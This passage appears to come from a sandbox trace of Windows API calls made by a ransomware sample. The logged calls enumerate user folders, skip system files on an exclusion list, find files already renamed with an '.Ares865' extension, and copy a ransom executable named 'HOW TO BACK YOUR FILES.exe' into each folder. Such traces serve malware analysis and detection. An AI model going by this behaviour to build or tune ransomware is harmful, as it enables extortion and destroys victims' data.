lpString2="pagefile.sys") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="boot") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="ids.txt") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="perflogs") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.963] lstrlenW (lpString="Hydrangeas.jpg.Ares865") returned 22 [0089.963] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\desktop.ini.Ares865") returned 76 [0089.963] lstrcpyW (in: lpString1=0x2cce472, lpString2="Hydrangeas.jpg.Ares865" | out: lpString1="Hydrangeas.jpg.Ares865") returned="Hydrangeas.jpg.Ares865" [0089.964] lstrlenW (lpString="Hydrangeas.jpg.Ares865") returned 22 [0089.964] lstrlenW (lpString="Ares865") returned 7 [0089.964] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.964] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbd920, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jellyfish.jpg.Ares865", cAlternateFileName="JELLYF~1.ARE")) returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2=".") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="..") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="windows") returned -1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="temp") returned -1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="boot") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="ids.txt") returned 1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="perflogs") returned -1 [0089.964] lstrcmpiW (lpString1="Jellyfish.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.964] lstrlenW (lpString="Jellyfish.jpg.Ares865") returned 21 [0089.964] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Hydrangeas.jpg.Ares865") returned 79 [0089.964] lstrcpyW (in: lpString1=0x2cce472, lpString2="Jellyfish.jpg.Ares865" | out: lpString1="Jellyfish.jpg.Ares865") returned="Jellyfish.jpg.Ares865" [0089.964] lstrlenW (lpString="Jellyfish.jpg.Ares865") returned 21 [0089.964] lstrlenW (lpString="Ares865") returned 7 [0089.964] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.964] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d02d680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbed20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Koala.jpg.Ares865", cAlternateFileName="")) returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2=".") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="..") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="windows") returned -1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="temp") returned -1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="boot") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="ids.txt") returned 1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="perflogs") returned -1 [0089.964] lstrcmpiW (lpString1="Koala.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.965] lstrlenW (lpString="Koala.jpg.Ares865") returned 17 [0089.965] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Jellyfish.jpg.Ares865") returned 78 [0089.965] lstrcpyW (in: lpString1=0x2cce472, lpString2="Koala.jpg.Ares865" | out: lpString1="Koala.jpg.Ares865") returned="Koala.jpg.Ares865" [0089.965] lstrlenW (lpString="Koala.jpg.Ares865") returned 17 [0089.965] lstrlenW (lpString="Ares865") returned 7 [0089.965] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.965] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d47de60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x89380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lighthouse.jpg.Ares865", cAlternateFileName="LIGHTH~1.ARE")) returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2=".") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="..") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="windows") returned -1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="temp") returned -1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="boot") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="ids.txt") returned 1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="perflogs") returned -1 [0089.965] lstrcmpiW (lpString1="Lighthouse.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.965] lstrlenW (lpString="Lighthouse.jpg.Ares865") returned 22 [0089.965] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Koala.jpg.Ares865") returned 74 [0089.965] lstrcpyW (in: lpString1=0x2cce472, lpString2="Lighthouse.jpg.Ares865" | out: lpString1="Lighthouse.jpg.Ares865") returned="Lighthouse.jpg.Ares865" [0089.965] lstrlenW (lpString="Lighthouse.jpg.Ares865") returned 22 [0089.965] lstrlenW (lpString="Ares865") returned 7 [0089.965] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.965] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d5ae960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbe170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Penguins.jpg.Ares865", cAlternateFileName="")) returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2=".") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="..") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="windows") returned -1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="temp") returned -1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="pagefile.sys") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="boot") returned 1 [0089.965] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="ids.txt") returned 1 [0089.966] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="ntuser.dat") returned 1 [0089.966] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="perflogs") returned -1 [0089.966] lstrcmpiW (lpString1="Penguins.jpg.Ares865", lpString2="MSBuild") returned 1 [0089.966] lstrlenW (lpString="Penguins.jpg.Ares865") returned 20 [0089.966] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Lighthouse.jpg.Ares865") returned 79 [0089.966] lstrcpyW (in: lpString1=0x2cce472, lpString2="Penguins.jpg.Ares865" | out: lpString1="Penguins.jpg.Ares865") returned="Penguins.jpg.Ares865" [0089.966] lstrlenW (lpString="Penguins.jpg.Ares865") returned 20 [0089.966] lstrlenW (lpString="Ares865") returned 7 [0089.966] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.966] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x97c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg.Ares865", cAlternateFileName="")) returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2=".") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="..") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="windows") returned -1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="temp") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="pagefile.sys") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="boot") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="ids.txt") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="ntuser.dat") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="perflogs") returned 1 [0089.966] lstrcmpiW (lpString1="Tulips.jpg.Ares865", lpString2="MSBuild") returned 1 [0089.966] lstrlenW (lpString="Tulips.jpg.Ares865") returned 18 [0089.966] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Penguins.jpg.Ares865") returned 77 [0089.966] lstrcpyW (in: lpString1=0x2cce472, lpString2="Tulips.jpg.Ares865" | out: lpString1="Tulips.jpg.Ares865") returned="Tulips.jpg.Ares865" [0089.966] lstrlenW (lpString="Tulips.jpg.Ares865") returned 18 [0089.966] lstrlenW (lpString="Ares865") returned 7 [0089.966] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.966] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x97c60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg.Ares865", cAlternateFileName="")) returned 0 [0089.966] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.966] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0089.966] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Music") returned="C:\\Users\\All Users\\Documents\\My Music" [0089.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0089.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0089.966] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Music") returned 37 [0089.967] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Music" | out: lpString1="C:\\Users\\All Users\\Documents\\My Music") returned="C:\\Users\\All Users\\Documents\\My Music" [0089.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.967] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.967] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.967] GetLastError () returned 0x0 [0089.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.967] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.967] CloseHandle (hObject=0x120) returned 1 [0089.968] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.968] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.968] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.968] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.968] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.968] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.968] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.968] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.968] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.968] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.968] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.968] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.968] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.969] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.969] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.969] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.969] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.969] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.969] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Music\\*") returned 39 [0089.969] lstrcpyW (in: lpString1=0x2cce44c, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.969] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.969] lstrlenW (lpString="Ares865") returned 7 [0089.969] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.969] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4977eaa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.969] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.969] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="aoldtz.exe") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="bootmgr") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="temp") returned -1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="pagefile.sys") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="boot") returned 1 [0089.969] lstrcmpiW (lpString1="Sample Music", lpString2="ids.txt") returned 1 [0089.969] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Documents\\My Music\\Sample Music" [0089.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0089.969] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Music\\Sample Music") returned 50 [0089.969] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Users\\All Users\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Documents\\My Music\\Sample Music" [0089.970] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.970] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.971] GetLastError () returned 0x0 [0089.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.971] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.971] CloseHandle (hObject=0x120) returned 1 [0089.971] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.971] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.971] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.972] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.972] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.972] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Desktop") returned="C:\\Users\\All Users\\Desktop" [0089.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccee8 | out: hHeap=0x2b0000) returned 1 [0089.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0089.972] lstrlenW (lpString="C:\\Users\\All Users\\Desktop") returned 26 [0089.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Desktop" | out: lpString1="C:\\Users\\All Users\\Desktop") returned="C:\\Users\\All Users\\Desktop" [0089.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.972] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.973] GetLastError () returned 0x0 [0089.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.973] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.973] CloseHandle (hObject=0x120) returned 1 [0089.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.973] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*", 